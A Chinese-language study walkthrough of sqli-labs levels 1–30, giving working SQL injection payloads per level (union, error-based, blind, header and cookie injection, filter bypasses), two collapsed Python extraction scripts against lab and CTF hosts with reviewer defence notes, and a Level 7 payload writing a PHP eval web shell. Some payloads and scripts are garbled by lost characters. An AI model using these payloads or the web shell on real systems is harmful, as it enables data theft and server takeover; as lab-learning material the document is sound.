第一关（'单引号字符型注入）
http://127.0.0.1/sqli/Less-1/?id=-1'union select 1,database() ,3 -- - 爆库
http://127.0.0.1/sqli/Less-1/?id=-1'union select 1,group_concat(table_name) ,3 from information_schema.tables where table_schema=database()-- - 爆表
http://127.0.0.1/sqli/Less-1/?id=-1'union select 1,group_concat(column_name) ,3 from information_schema.columns where table_name='users' and table_schema=database()-- - 爆字段
http://127.0.0.1/sqli/Less-1/?id=-1'union select 1,group_concat(id,username,password) ,3 from security.users -- - 爆字段
第二关(数字型注入,无闭合符)
http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,2,3-- -
第三关（')闭合绕过）
http://127.0.0.1/sqli/Less-3/?id=-1') union select 1,2,3-- -
第四关(")绕过)
http://127.0.0.1/sqli/Less-4/?id=-1") union select 1,2,3-- -
第五关(二次查询'单引号floor报错注入最长64字符)
wp：尝试各种输入后发现没有数据回显，但输入 ' 会触发报错，因此使用报错注入
刘子璇版(https://blog.csdn.net/qq_43573676/article/details/105774162)
?id=1' union select 1,count(*),concat(0x7e,(select database()),0x7e,floor(rand(0)*2))as text from information_schema.tables group by test-- -爆库
?id=1' union select 1,count(*),concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit0,1),0x7e,floor(rand(0)*2))as text from information_schema.tables group by test-- -爆表
?id=1' union select 1,count(*),concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit0,1),0x7e,floor(rand(0)*2))as text from information_schema.tables group by test-- -爆字段
?id=1' union select 1,count(*),concat(0x7e,(select password from users limit0,1),0x7e,floor(rand(0)*2))as text from information_schema.tables group by test-- -爆密码
and (select 1 from (select count(),concat(( payload),floor (rand(0)2))x from
徐博文版
information_schema.tables group by x)a)语句的构建
?id=2' and (select 1 from (select count(),concat(((select concat(database(),';'))),floor (rand(0)2))x from information_schema.tables group by x)a) -- - 当前数据库
?id=2' and (select 1 from (select count(),concat(((select concat(table_name,';') from information_schema.tables where table_schema='security' limit 0,1)),floor (rand(0)2))x from information_schema.tables group by x)a) -- -当前数据库的表
?id=2' and (select 1 from (select count(),concat(((select concat(column_name,';') from information_schema.columns where table_name='users' limit 5,1)),floor (rand(0)2))x from information_schema.tables group by x)a) -- - 爆列名
15-17
?id=2' and (select 1 from (select count(),concat(((select concat(password,';') from users limit 0,1)),floor (rand(0)2))x from information_schema.tables group by x)a) -- -爆内容
相关知识
- count()：聚合函数，统计行数
- rand()：返回一个大于等于 0、小于 1 的随机数
- floor()：对结果向下取整
- group by 语句：按指定列对结果分组输出
- concat()：把多个字符串/字段连接成一个字符串
- 十种MySQL报错注入 - 我擦咧什么鬼 - 博客园 (cnblogs.com)
- concat mysql sql注入_SQL注入之MySQL报错注入整理_weixin_39908758的博客-CSDN博客
- 脚本
# Review note: this script was pasted with its line breaks collapsed, so it will not run as
# shown; the Chinese lines between the code lines are markdown section headings, not code.
# What it does (as written): sends GET requests to a hard-coded sqli-labs Less-5 lab URL with an
# error-based payload appended to the `id` parameter, reads the leaked value out of the database
# error text that the lab page echoes back (`r.text.split(':')[-2]`), and stops each loop when
# the marker string 'group_key' is absent from the response.
# Defender's view: the technique depends on (1) `id` being concatenated into SQL as a string and
# (2) the raw DBMS error message being returned to the client. Parameterized queries remove the
# injection; returning a generic error page instead of the DBMS message removes the oracle this
# script reads from. Many sequential requests to one endpoint whose query string references
# information_schema are a useful detection signal.
# NOTE(review): `BeautifulSoup` is imported but never used.
import requests from bs4 import BeautifulSoup db_name = '' table_list = [] column_list = [] url = '''http://192.168.1.113:86/Less-5/?id=1'''
获取当前数据库名
print('当前数据库名:') payload = '''' and 1=(select count() from information_schema.columns group by concat(0x3a,(select database()),0x3a,floor(rand(0)2)))--+''' r = requests.get(url+payload) db_name = r.text.split(':')[-2] print('[+]' + db_name)
获取表名
print('数据库%s下的表名:' % db_name) for i in range(50): payload = '''' and 1=(select count() from information_schema.columns group by concat(0x3a,(select table_name from information_schema.tables where table_schema='%s' limit %d,1),0x3a,floor(rand(0)2)))--+''' % (db_name,i) r = requests.get(url+payload) if 'group_key' not in r.text: break table_name = r.text.split(':')[-2] table_list.append(table_name) print('[+]' + table_name)
获取列名
这里以users表为例
print('%s表下的列名:' % table_list[-1]) for i in range(50): payload = '''' and 1=(select count() from information_schema.columns group by concat(0x3a,(select column_name from information_schema.columns where table_name='%s' limit %d,1),0x3a,floor(rand(0)2)))--+''' % (table_list[-1],i) r = requests.get(url + payload) if 'group_key' not in r.text: break column_name = r.text.split(':')[-2] column_list.append(column_name) print('[+]' + column_name)
获取字段值
这里以username列为例
print('%s列下的字段值:' % column_list[-2]) for i in range(50): payload = '''' and 1=(select count() from information_schema.columns group by concat(0x3a,(select %s from %s.%s limit %d,1),0x3a,floor(rand(0)2)))--+''' % (column_list[-2],db_name,table_list[-1],i) r = requests.get(url + payload) if 'group_key' not in r.text: break dump = r.text.split(':')[-2] print('[+]' + dump)
第六关("双引号floor报错注入最长64字符)
?id=2” and (select 1 from (select count(),concat(((select concat(database(),';'))),floor (rand(0)2))x from information_schema.tables group by x)a) -- - 当前数据库
第七关（'))闭合，into outfile 写文件）
Less-7/?id=-1’)) and 1=2 union slect 1,"<?php @eval($_POST['cmd']);?>",3 into outfile ‘outcome.php’–- - 文件默认在@@datadir显示的数据库的当前库的根目录下
?id=-1')) union select 1,"<?php @eval($_POST['cmd']);?>",3 into outfile "C:\\phpStudy\\PHPTutorial\\WWW\\123456.php" -- - 也可以自定义路径,这里转义了\,需要\\来表示\
相关知识
1. 在 mysql.ini 中添加 secure_file_priv=""（仅为复现本关而放开限制，生产环境不应这样配置）
secure_file_priv=NULL -- 限制 mysqld 不允许导入导出
secure_file_priv=/path/ -- 限制 mysqld 的导入导出只能发生在 /path/ 目录下
secure_file_priv="" -- 不对 mysqld 的导入导出做限制
2. 因为第七关没有回显，所以利用第一关查看路径和 secure_file_priv 的取值
/Less-1/?id=-1’ union select 1,@@datadir,@@secure_file_priv-- -
@@datadir 是系统变量（不是函数），显示 MySQL 存放数据文件的目录，即 mysql 的 data 目录路径
@@secure_file_priv 系统变量显示文件导入导出被限制到的目录
3. into outfile 的使用前提是：目标目录对 mysqld 进程可写，路径符合 secure_file_priv 的限制，且数据库账号具有 FILE 权限
4.into outfile 将查询结果写入文件里
5.MySQL中的basedir和datadir的作用
第八关(’单引号字符型注入,也可以布尔和时间盲注)
id=1'and ascii(substring(database(),1,1))=115--+
第九关('单引号睡眠注入)
尝试各种输入后发现页面回显都一样，因此改用睡眠（时间）盲注
?id=1' and If(ascii(substr(database(),1,1))=115,1,sleep(5))-- -
即 ascii(substr(当前数据库名, 从第 1 个字符开始, 截取 1 个))：条件成立时页面立即返回，否则延迟 5 秒再返回，通过响应时间判断真假
sleep(if(length(database())=8,0,5))-- - 如果数据库长度=8,不睡,否则睡5秒。
if(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='a',sleep(5),1) -- - a为尝试的数字,爆表名
?id=-1' union select 1,2,group_concat(concat_ws("-",username,password)) from users-- -
相关知识
- concat_ws(分隔符, 要连接的字段, ...)：第一个参数是分隔符，必须显式给出
- substr(被截取对象, 起始位置, 截取长度)
- ascii()：返回字符的 ASCII 码值
- 睡眠（时间）盲注脚本
# Review note: collapsed paste, will not run as shown. The `#url=...` fragments followed by
# Chinese labels are commented-out alternatives (labelled: look up database / table names /
# column names); the live `url=` line is labelled "query data".
# What it does (as written): for each candidate character in `table`, builds a time-based
# payload (ELT(..., SLEEP(n))) into a union select on a hard-coded CTF lab URL, times the
# request, and appends the character to `flag` when the response took 4 s or longer.
# Defender's view: time-based blind injection leaves no error text to suppress, so the
# mitigation is parameterized queries at the source; for detection, look for long runs of
# sequential requests to one endpoint whose latency clusters at a fixed delay and whose
# parameters contain SLEEP().
# NOTE(review): the dict key is spelled 'datebase' (sic) in the original.
import requests import time flag = '' table="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890_{}" while True: for i in table: ss = time.time() data = { 'datebase':'''ELT(left((SELECT schema_name FROM information_schema.schemata limit 0,1),{})='{}{}',SLEEP(2))'''.format(len(flag)+1,flag, i), 'table':'''ELT(left((SELECT TABLE_NAME FROM information_schema.tables WHERE TABLE_SCHEMA="ctftraining" limit 0,1),{})='{}{}',SLEEP(2))'''.format(len(flag)+1,flag, i), 'column':'''ELT(left((SELECT column_name FROM information_schema.columns WHERE table_name = 'flag' limit 0,1),{})='{}{}',SLEEP(2))'''.format(len(flag)+1,flag, i), 'flag':'''ELT(left((SELECT flag FROM ctftraining.flag limit 0,1),{})='{}{}',SLEEP(5))'''.format(len(flag)+1,flag, i), } #url="http://e40ffbdc-1bae-4621-a7c4-4326289ff1d6.node1.buuoj.cn/Less-8/?id=1%27 union select 1,1,("+data['datebase']+")--+" 查找数据库 #url="http://e40ffbdc-1bae-4621-a7c4-4326289ff1d6.node1.buuoj.cn/Less-8/?id=1%27 union select 1,1,("+data['table']+")--+" 查表名 #url="http://e40ffbdc-1bae-4621-a7c4-4326289ff1d6.node1.buuoj.cn/Less-8/?id=1%27 union select 1,1,("+data['column']+")--+" 查字段名 url="http://e40ffbdc-1bae-4621-a7c4-4326289ff1d6.node1.buuoj.cn/Less-8/?id=1%27 union select 1,1,("+data['flag']+")--+" #查数据 t=requests.get(url)
if time.time()-ss>=4: flag += i print (flag)
第十关("双引号睡眠注入)
?id=1" and If(ascii(substr(database(),2,1))=101,1,sleep(5))-- -
第十一关(post'注入)
uname=0' union select 1,database()-- -&passwd=123&submit=Submit
第十二关(POST ")注入)
uname=123")union select 1,database()-- -&passwd=123&submit=Submit
第十三关(post')报错注入)
uname=123') union select count(),concat(0x7e,(select database()),0x7e,floor(rand()2))as a from information_schema.tables group by a -- -&passwd=123')or 1-- -&submit=Submit 至于为什么不能') "-- -闭合运行我也不知道
第十四关(基于"的post"报错注入)
uname=123"union select count(),concat(0x7e,(select database()),0x7e,floor(rand()2))as a from information_schema.tables group by a -- - &passwd=123"or 1-- -&submit=Submit
第十五关(基于‘的post‘布尔盲注)(dns注入)
uname=123' or (length(database())) = 8-- -&passwd=123'-- -&submit=Submit
第十六关(基于'的post")睡眠盲注)(dns注入)
1") and If(ascii(substr(database(),1,1))=115,sleep(5),1)#
第十七关(基于'的密码报错注入)
传入合法时,修改
admb’ or extractvalue(1,concat(0x7e,(select database())))#
uname=admin&passwd=1' and (select 1 from (select count(),concat((SELECT schema_name FROM information_schema.schemata limit 0,1),floor (rand(0)2))x from information_schema.tables group by x)a) #
第十八关(基于'的post'User-Agent头注入)adminadmin登录
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93 'or updatexml(1,concat(0x7e,(database()),0x7e),1) or '1
第十九关(基于'的post'Referer头注入)adminadmin登录
Referer: http://127.0.0.1/sqli/Less-19/'or updatexml(1,concat(0x7e,(database()),0x7e),1) or '1
第二十关(基于'的post'cookie头报错注入)adminadmin登录
Cookie: uname=admin'or updatexml(1,concat(0x7e,(database()),0x7e),1) or '1
第二十一关(基于’)字符型的post'cookie头base64加密注入)adminadmin
')union select 1,2,database()-- -没成功
第二十二关(基于"的cookie编码base64注入)
uname=" union select 1,2,3# ;
Cookie: uname=IiB1bmlvbiBzZWxlY3QgMSwyLDMjIDs=
第二十三关(过滤注释的GET型注入)
id=-1' union select 1,2,3 ='1
第二十四关(二次注入)
知道admin用户存在但不知道密码
点击New User click here?注册admin'-- - 123456
登录admin 密码为123456
第二十五关(过滤or和and的单引号注入)
?id=-1' union select 1,2,3-- -
第二十六关(基于’过滤注释和空格的注入)
?id=-1'aandnd(updatexml(1,@@datadir,1))anandd'1'='1
第二十七关(基于’过滤union、select与注释和空格的注入)
?id=1'and(updatexml(1,@@datadir,1))and'1'='1
第二十八关(基于’)过滤union和select等的盲注)
id=111') UnIon All Select ('1'),2,('3 url编码
?id=111%27)%0AUnIon%0AAll%0ASelect%0A(%271%27),2,(%273
第二十九关(index.php——基于单引号字符型的注入)
index.php?id=-1' union select 1,2,3 -- -
login.php——基于单引号的参数污染绕过
login.php?id=1&id=-1' union select 1,2,3 -- -
第三十关(index.php——基于双引号字符型的注入)
?id=-1" union select 1,2,3 -- -
login.php——基于双引号的参数污染绕过
login.php?id=1&id=-1" union select 1,2,3 -- -
参考链接:mysql-injection.pdf
sqli-labs注入——sqli-labs的1-65关闯关指南_lacryma5555的博客-CSDN博客